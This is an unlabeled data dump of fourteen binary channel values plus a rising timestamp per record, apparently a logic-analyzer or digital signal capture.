0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7991260e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7991288e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7991312e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7991336e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7991340e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7991388e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7991412e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7991420e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7991460e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7991488e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7991492e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7991512e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7991536e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7991564e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7991588e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7991612e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7991636e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7991644e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7991688e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7991712e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7991740e-02 0,0,0,0,1,0,0,0,0,1,0,0,0,0,3.7991764e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7991768e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7991788e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7991812e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7991860e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7991888e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7991912e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7991936e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7991964e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7991988e-02 0,0,0,0,1,1,0,0,0,0,0,0,0,0,3.7991992e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7991996e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7992012e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7992036e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7992060e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7992084e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7992112e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7992136e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7992164e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7992188e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7992212e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7992236e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7992288e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7992312e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7992316e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7992364e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7992388e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7992396e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7992436e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7992460e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7992488e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7992512e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7992536e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7992564e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7992612e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7992636e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7992644e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7992688e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7992712e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7992716e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7992740e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7992764e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7992788e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7992812e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7992836e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7992860e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7992868e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7992912e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7992940e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7992964e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7992988e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7993012e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7993036e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7993060e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7993084e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7993112e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7993136e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7993164e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7993188e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7993212e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7993236e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7993260e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7993284e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7993312e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7993336e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7993364e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7993388e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7993412e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7993436e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7993460e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7993484e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7993492e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7993540e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7993564e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7993572e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7993588e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7993612e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7993636e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7993660e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7993684e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7993712e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7993764e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7993788e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7993792e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7993812e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7993836e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7993860e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7993884e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7993912e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7993936e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7993964e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7993988e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7993996e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7994036e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7994060e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7994084e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7994112e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7994116e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7994136e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7994164e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7994212e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7994236e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7994260e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7994284e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7994312e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7994336e-02 0,0,0,0,1,1,0,0,0,0,0,0,0,0,3.7994340e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7994344e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7994364e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7994388e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7994412e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7994436e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7994460e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7994484e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7994512e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7994536e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7994564e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7994588e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7994612e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7994636e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7994660e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7994684e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7994712e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7994736e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7994764e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7994788e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7994812e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7994836e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7994888e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7994912e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7994916e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7994940e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7994964e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7994988e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7995012e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7995036e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7995060e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7995084e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7995112e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7995116e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7995164e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7995188e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7995212e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7995236e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7995288e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7995312e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7995316e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7995340e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7995364e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7995388e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7995412e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7995436e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7995460e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7995484e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7995512e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7995516e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7995564e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7995588e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7995612e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7995636e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7995660e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7995684e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7995712e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7995736e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7995764e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7995788e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7995812e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7995836e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7995860e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7995884e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7995912e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7995936e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7995964e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7995988e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7996012e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7996036e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7996060e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7996084e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7996112e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7996136e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7996164e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7996188e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7996212e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7996236e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7996260e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7996284e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7996312e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7996336e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7996364e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7996388e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7996412e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7996436e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7996460e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7996484e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7996512e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7996536e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7996564e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7996588e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7996612e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7996636e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7996660e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7996684e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7996712e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7996736e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7996764e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7996788e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7996812e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7996836e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7996860e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7996884e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7996912e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7996936e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7996964e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7996988e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7997012e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7997036e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7997060e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7997084e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7997112e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7997136e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7997140e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,3.8121556e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,3.8121796e-02 1,0,0,0,1,1,0,0,0,1,0,1,0,1,3.8121828e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,3.8121852e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,1,3.8122168e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,3.8122192e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,3.8122196e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,3.8122220e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,3.8122244e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,3.8122268e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,3.8122292e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,3.8122316e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,3.8122340e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,3.8122364e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8122388e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8122392e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8122420e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8122444e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8122468e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8122492e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8122516e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8122540e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8122564e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8122592e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8122616e-02 1,0,0,0,1,0,0,0,0,1,0,0,0,0,3.8122644e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8122648e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8122692e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8122716e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8122724e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8122740e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8122768e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8122792e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8122816e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8122844e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8122864e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8122872e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8122916e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8122940e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8122948e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8122964e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8122988e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8123012e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8123040e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8123064e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8123092e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8123116e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8123140e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8123144e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8123164e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8123188e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8123196e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8123212e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8123240e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8123244e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8123292e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8123316e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8123340e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8123364e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8123372e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8123388e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8123412e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8123440e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8123464e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8123492e-02 1,0,0,0,1,0,0,0,0,1,0,0,0,0,3.8123516e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8123520e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8123564e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8123588e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8123596e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8123612e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8123640e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8123664e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8123692e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8123740e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8123764e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8123772e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8123788e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8123812e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8123840e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8123864e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8123892e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8123916e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8123940e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8123964e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8123988e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8124012e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8124040e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8124064e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8124092e-02 1,0,0,0,1,0,0,0,0,1,0,0,0,0,3.8124116e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8124120e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8124140e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8124164e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8124192e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8124212e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8124240e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8124264e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8124272e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8124316e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8124340e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8124364e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8124392e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8124396e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8124440e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8124464e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8124492e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8124516e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8124524e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8124540e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8124564e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8124588e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8124612e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8124640e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8124664e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8124668e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8124716e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8124740e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8124748e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8124764e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8124788e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8124812e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8124840e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8124864e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8124892e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8124916e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8124940e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8124964e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8124988e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8125012e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8125040e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8125064e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8125092e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8125116e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8125140e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8125164e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8125188e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8125212e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8125240e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8125264e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8125292e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8125340e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8125364e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8125372e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8125388e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8125412e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8125440e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8125464e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8125492e-02 1,0,0,0,1,0,0,0,0,1,0,0,0,0,3.8125516e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8125520e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8125540e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8125564e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8125572e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8125616e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8125640e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8125692e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8125716e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8125740e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8125764e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8125788e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8125812e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8125820e-02 